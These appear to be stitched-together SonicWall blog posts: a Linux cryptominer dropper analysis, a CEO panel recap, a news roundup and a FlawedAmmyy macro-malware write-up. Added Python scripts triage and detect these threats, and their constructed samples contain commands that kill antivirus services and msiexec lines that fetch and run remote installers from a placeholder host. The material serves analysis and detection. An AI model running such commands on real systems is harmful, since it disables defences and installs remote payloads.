  • SetStartup – downloads the nohup utility if not present and adds itself as a local daemon in
  • Rootkit – downloads and runs a rootkit called BRootkit, whose functionality includes getting root access and hiding processes, directories and network connections, among many others.
  • GetRootAccess – more functionality to get root access using the Dirty COW exploit.
  • Checkupdate – checks for the most current version on the remote host.
  • Guard – downloads another known Linux Trojan called BillGates. It uses BillGates’ “CleartheGates” functionality to open ports and services, taking nearly full control over the infected system.

This malware author clearly took the time to guarantee persistence and successful infection.
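As an added example (not the SonicWall team's own tooling), the Python triage script below extracts a dropper's function definitions, Stratum pool endpoints, /etc/issue platform check and the security products it tries to stop, and maps the function names listed above to capabilities; SAMPLE_SCRIPT is a constructed stand-in with harmless commands, not the real 800-line dropper.

```python
"""Static triage of a cryptominer bash dropper like the one described above.

Added example, not the SonicWall team's tooling. It pulls the script's
function definitions, Stratum pool endpoints, the /etc/issue platform check
and the security products it tries to kill, and maps the function names
listed above to capabilities. SAMPLE_SCRIPT is a constructed stand-in with
harmless commands, not the real 800-line dropper.
"""
import re

# Sub-function names from the write-up and what each one does.
KNOWN_FUNCTIONS = {
    "BasicInit": "connectivity and platform check",
    "RunInBack": "Dirty COW (CVE-2016-5195) privilege escalation",
    "WorkProc": "Stratum/CryptoNight mining",
    "Dandelion": "lateral spread",
    "Scavenger": "kills services and uninstalls security products",
    "SetStartup": "persistence via nohup daemon",
    "Rootkit": "BRootkit download",
    "GetRootAccess": "Dirty COW privilege escalation",
    "Checkupdate": "self-update from remote host",
    "Guard": "BillGates trojan download",
}
# Products the Scavenger routine stops, as listed in the write-up.
KILL_TARGETS = ["safedog", "aegis", "yunsuo", "clamd", "avast", "avgd", "cmdavd",
                "cmdmgd", "drweb-configd", "drweb-spider-kmod", "esets", "xmirrord"]

FUNC_DEF_RE = re.compile(r"^\s*(?:function\s+)?([A-Za-z_]\w*)\s*\(\)\s*\{", re.M)
POOL_RE = re.compile(r"stratum\+(?:tcp|ssl)://([\w.-]+):(\d+)")
KILL_RE = re.compile(
    r"\b(?:pkill|killall|service)\b[^\n]*?\b("
    + "|".join(map(re.escape, KILL_TARGETS)) + r")\b",
    re.I,
)

# Constructed stand-in: same structure as the dropper, harmless commands only.
SAMPLE_SCRIPT = r"""#!/bin/bash
BasicInit() {
    ping -c1 auth.to0ls.com >/dev/null 2>&1 && ONLINE=1
    grep -qi centos /etc/issue && PLATFORM=centos
}
WorkProc() {
    ./miner -o stratum+tcp://pool.supportxmr.com:3333 -a cryptonight -u WALLET_PLACEHOLDER
    ./miner -o stratum+tcp://pool.minexmr.com:4444 -a cryptonight -u WALLET_PLACEHOLDER
}
Scavenger() {
    service safedog stop
    pkill -9 clamd
    pkill -9 aegis
}
function SetStartup() {
    which nohup || echo "would fetch nohup here"
    nohup ./guard >/dev/null 2>&1 &
}
"""


def triage_script(text: str) -> dict:
    """Summarize what a bash dropper is built to do, from its text alone."""
    funcs = FUNC_DEF_RE.findall(text)
    return {
        "functions": funcs,
        "capabilities": {f: KNOWN_FUNCTIONS[f] for f in funcs if f in KNOWN_FUNCTIONS},
        "pools": sorted({f"{host}:{port}" for host, port in POOL_RE.findall(text)}),
        "platform_check": "/etc/issue" in text,
        "kill_targets": sorted({m.lower() for m in KILL_RE.findall(text)}),
        "cryptonight": bool(re.search(r"\bcryptonight\b", text, re.I)),
    }


def looks_like_miner_dropper(report: dict) -> bool:
    """Heuristic: a mining pool plus persistence, AV killing or a platform check."""
    return bool(report["pools"]) and bool(
        "SetStartup" in report["capabilities"]
        or report["kill_targets"]
        or report["platform_check"]
    )


if __name__ == "__main__":
    report = triage_script(SAMPLE_SCRIPT)
    for key, value in report.items():
        print(f"{key}: {value}")
    print("miner dropper:", looks_like_miner_dropper(report))
```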

SonicWALL Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.LNX (Trojan)
  • GAV: Billgates.ELF (Trojan)
  • GAV: CVE-2016-5195.DC (Exploit)
  • GAV: BRootkit.LNX (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

AI, Threat Intelligence and The Cyber Arms Race: SonicWall CEO Bill Conner Joins Chertoff Group Security Series Event

SonicWall President and CEO Bill Conner was featured as part of an exclusive group of cybersecurity thought-leaders at The Chertoff Group Security Series Event, “AI, Threat Intelligence and The Cyber Arms Race,” on June 18.

Conner was flanked by Christopher Krebs, Director of Cybersecurity and Infrastructure Security Agency (CISA) in the Department of Homeland Security; Dimitri Kusnezov, Deputy Under Secretary for Artificial Intelligence & Technology, Department of Energy; along with panel moderator Chad Sweet, Chief Executive Officer and Co-Founder, The Chertoff Group.

Together, they took to the stage to discuss how AI solutions are being leveraged to prevent, detect and respond to the cyber threats attacking both critical public infrastructure and the private sector.

The wide-ranging discussion took on everything from election cybersecurity to self-driving cars, but was grounded by a focus on how AI is increasingly growing in importance when running cyber defenses in both the public and private sectors.

With this in mind, they looked at the increasing number of ‘haves and have-nots’ in these areas, with Conner pointing out that an underfunded agency or a small company simply doesn’t “have the resource — capital or human” to defeat a major cyberattack without AI-based cyber defenses such as SonicWall Real-Time Deep Memory Inspection™ (RTDMI) that can both detect and prevent existing and never-before-seen cyberattacks as they appear.

From left to right, The Chertoff Group co-founder Chad Sweet, CISA director Christopher Krebs, DOE Deputy Under Secretary Dimitri Kusnezov and SonicWall CEO Bill Conner converse during The Chertoff Group Security Series June 18 in Maryland.

‘It starts with the chip’

The conversation moved on to discuss current types of cyberattacks and how growth in 5G, while increasing exponentially, is leaving itself open to sophisticated state-sponsored attacks because the industry has still not fully agreed upon a security standard.

They agreed that in 2019 cybersecurity has to go all the way down to the supply chain and chip level, especially when considering ongoing controversies over alleged government influence on companies like Huawei, and confirmed tech problems like the side-channel vulnerabilities in Intel chips. In Bill Conner’s words, “It does start with the chip … because that’s everywhere.”

Watch the whole video for the in-depth consideration of the threats posed by Internet of Things (IoT) growth, a lively Q&A session with the audience, and the astute observation that modern cyber threats are borderless and not bound by the same rules as other threats.

“Tariffs and borders are all interesting. They’re all the rage these days,” said Conner. “But cyber doesn’t care about that … we have to think differently … we learned how to fight air, land and sea, [now] we’re learning how to fight cyber.”

About the Chertoff Group Security Series

Since 2013, The Chertoff Group Security Series has become a respected community building event to discuss important national security and risk management issues, highlight innovation, and network with leading practitioners, policy makers, investors, and thought leaders.

The Chertoff Group Security Series convenes CEOs, CSOs, CIOs, CISOs, COOs, General Counsels, senior agency leadership, and senior IT risk executives from both the public and private sectors. The forum welcomes technology and security leaders across a variety of industries whose operational business decisions are impacted by technology and who are seeking insight on the role of policy in today’s global technology business market.

Cyber Security News & Trends – 06-28-19

This week, SonicWall is featured on Reuters TV, federal cybersecurity is found to be seriously out of date, and a young hacker is taking down Internet of Things botnets by bricking as many IoT objects as he can.


SonicWall Spotlight

To Pay or Not To Pay: U.S. Cities With Ransomware – Reuters

  • SonicWall’s Dmitriy Ayrapetov is featured demonstrating a ransomware attack in this Reuters video segment investigating the current increase in ransomware attacks on US cities.

HiddenTear Ransomware Variant Encrypts and Gives Files .Poop Extension – SonicAlert

  • The SonicWall Capture Labs Threat Research Team came across some childish ransomware which, after replacing your files with a “.poop” extension, updates your background with a poop emoji. It is, however, real ransomware and should be treated as such; SonicWall protects you from it.

Cyber Security News

U.S. Carried Out Cyberattacks on Iran – New York Times

  • Multiple news outlets report that the United States Cyber Command conducted online attacks against an Iranian intelligence group after physical strikes were called off. Full details on what was attacked are not known and US Cyber Command have not released any information.

Federal Cybersecurity Defenses Are Critical Failures, Senate Report Warns – CNBC

  • After a 10-month review of federal agencies, a damning 99-page report on federal cybersecurity has been released. Details include failures to apply mandatory security patches, ignoring well-known threats and weaknesses for a decade or more, and outdated systems with at least one case of a 50-year-old system still in use in 2019.

NASA Hacked Because of Unauthorized Raspberry Pi Connected to Its Network – ZDNet

  • NASA confirmed that in April 2018 a hacker breached their security using a Raspberry Pi device and accessed around 500 megabytes of data, including information on the ongoing Mars Curiosity Rover mission. The full investigation into what happened is still ongoing.

The Hotel Hackers Are Hiding in the Remote Control Curtains – Bloomberg

  • Bloomberg hitches a ride with some IT consultants who are investigating the rise of cyberattacks on hotels – seen by the hacking community to be both lacking in basic cybersecurity and a massive database of personal information.

Hackers Strike Another Small Florida City, Demanding Hefty Ransom – Wall Street Journal

  • Lake City officials in Florida agreed to pay 42 bitcoins, around $500,000, in ransom less than a week after another Florida city, Riviera Beach, paid a similar amount to retrieve their data.

A Firefox Update Fixes yet Another Zero-Day Vulnerability – Engadget

  • Mozilla patched two zero-day vulnerabilities over the past week, with the second coming only 48 hours after the first. Both zero-days used the same attack and they appeared to be targeting Coinbase employees directly.

Riltok Banking Trojan Begins Targeting Europe – SC Magazine

  • The Riltok banking trojan, originally intended to target Russians, has been modified to target the European market. It is spread via a link in a text message that, if clicked, directs the user to a website that prompts them to install a fake update of advertising software.

And finally:

Thousands of IoT Devices Bricked By Silex Malware – Threat Post

  • A 14-year-old hacker has been spreading anti-Internet of Things malware, saying he wants to stop other hackers from using the devices for botnets. At the time of writing, at least 4,000 devices have been bricked by his malware.

In Case You Missed It

Malicious Office files are seen distributing FlawedAmmyy RAT

SonicWall Capture Labs Threat Research Team identified a new wave of malicious Office files being used to distribute a Remote Administration Tool belonging to the FlawedAmmyy family. Both MS-Excel and MS-Word files containing VBA Macro code have been observed downloading and executing the FlawedAmmyy malware.

Infection cycle
The Office file arrives as an email attachment; once the user enables macros, the macro code runs. Its purpose is to download a Windows Installer file (MSI file) and execute it.

On execution, the MSI file drops a file into the folder “%systemdrive%\programData\”. The dropped file, observed to be named either WSUS.exe or hkmoov.exe, belongs to the FlawedAmmyy family. Both the MSI file and the dropped file carry a valid digital signature.

Different variants of Office files showing this behavior have been spotted in the wild.

Variant 1
The first variant was spotted on 20-May-2019. Upon opening the malicious Office attachment, an image is displayed with a message in Korean asking the user to enable macros, as shown below:


Fig-1: image displaying message to enable macros

This variant contains the malicious code in a single subroutine, which is executed as soon as macros are enabled after opening the file, as shown below:


Fig-2: Macro Code

As can be seen in the image above, the Tag property of the UserForm in the macro contains the URL from which the payload is downloaded.


Variant 2
The second variant was first observed on 27-May-2019. The only change observed in this variant is that the malicious code was moved into multiple modules, as shown below:


Fig-3: Macro Code moved into multiple modules


Variant 3
The third variant was first observed on 18-June-2019. With this variant we observed a number of changes, listed below:

  1. MS-Word files were used to distribute FlawedAmmyy.
  2. The Windows Installer [msiexec] is used to execute the downloaded payload, whereas the Windows Command Processor [cmd] was used in earlier variants.
  3. The displayed message is in English, as shown below:


Fig-4: Text in English language


Fig-5: Macro Code using msiexec to execute the downloaded payload


Variant 4
The fourth variant was first observed on 19-June-2019. This variant moved back to using MS-Excel files and displays the message in Korean.


Fig-6: Macro Code
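The chain described above (Office macro launching cmd or msiexec with a download URL, then a validly signed MSI dropping WSUS.exe or hkmoov.exe under ProgramData) can be matched in process-creation telemetry. The following is an added detection example, not SonicWall's code: the `key=value|...` record format, the sample events and the exact command lines are constructed assumptions, and the URL hosts are placeholders rather than the campaign's real download servers.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe"}   # macro hosts seen across the variants
LAUNCHERS = {"cmd.exe", "msiexec.exe"}          # cmd in early variants, msiexec in later ones
DROPPED_NAMES = {"wsus.exe", "hkmoov.exe"}      # dropped filenames named on the page
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def parse_event(line):
    """Parse one 'key=value|key=value' process-creation record (constructed format)."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def basename(path):
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the chain stages this event matches; an empty list means no match."""
    findings = []
    parent, image = basename(event["parent"]), basename(event["image"])
    # Stage 1: the macro in Word/Excel launches cmd (early variants) or msiexec
    # (later variants) with a download URL on the command line (assumed shape).
    if parent in OFFICE_PARENTS and image in LAUNCHERS and URL_RE.search(event["cmdline"]):
        findings.append("office-launcher-with-url")
    # Stage 2: the MSI drops WSUS.exe / hkmoov.exe under ProgramData and runs it.
    # Do not rely on Authenticode here: the page notes both the MSI and the dropped
    # file carried valid signatures, so the path and filename are the usable signals.
    if "\\programdata\\" in event["image"].lower() and image in DROPPED_NAMES:
        findings.append("flawedammyy-drop-name")
    return findings

def scan(lines):
    """Return [(line_index, findings)] for every record matching at least one stage."""
    hits = []
    for index, line in enumerate(lines):
        found = classify(parse_event(line))
        if found:
            hits.append((index, found))
    return hits

# Constructed sample telemetry; hosts use the reserved .invalid TLD, not the real servers.
SAMPLE_EVENTS = [
    r"parent=C:\Program Files\Microsoft Office\EXCEL.EXE|image=C:\Windows\System32\cmd.exe|cmdline=cmd /c msiexec /i http://example.invalid/tmp /q",
    r"parent=C:\Program Files\Microsoft Office\WINWORD.EXE|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec /i http://example.invalid/q3 /q",
    r"parent=C:\Windows\System32\msiexec.exe|image=C:\ProgramData\WSUS.exe|cmdline=C:\ProgramData\WSUS.exe",
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec /i C:\Users\alice\Downloads\setup.msi",
]
```

The fourth sample (a local MSI launched from Explorer) produces no finding, which is the check that the rule keys on the Office parent plus URL rather than on msiexec alone.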

The malware uses a number of different images across the variants, all carrying the same message, as shown below:

Image1, Image2, Image3

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: MalOffice.J0 (Trojan)
  • GAV: MalOffice.J1 (Trojan)
  • GAV: MalOffice.J3 (Trojan)

This threat is detected proactively by Capture ATP w/RTDMI.


Capture ATP Report

Indicators Of Compromise

  • SHA-256:

  • Network Connections:


  • Payload SHA-256:
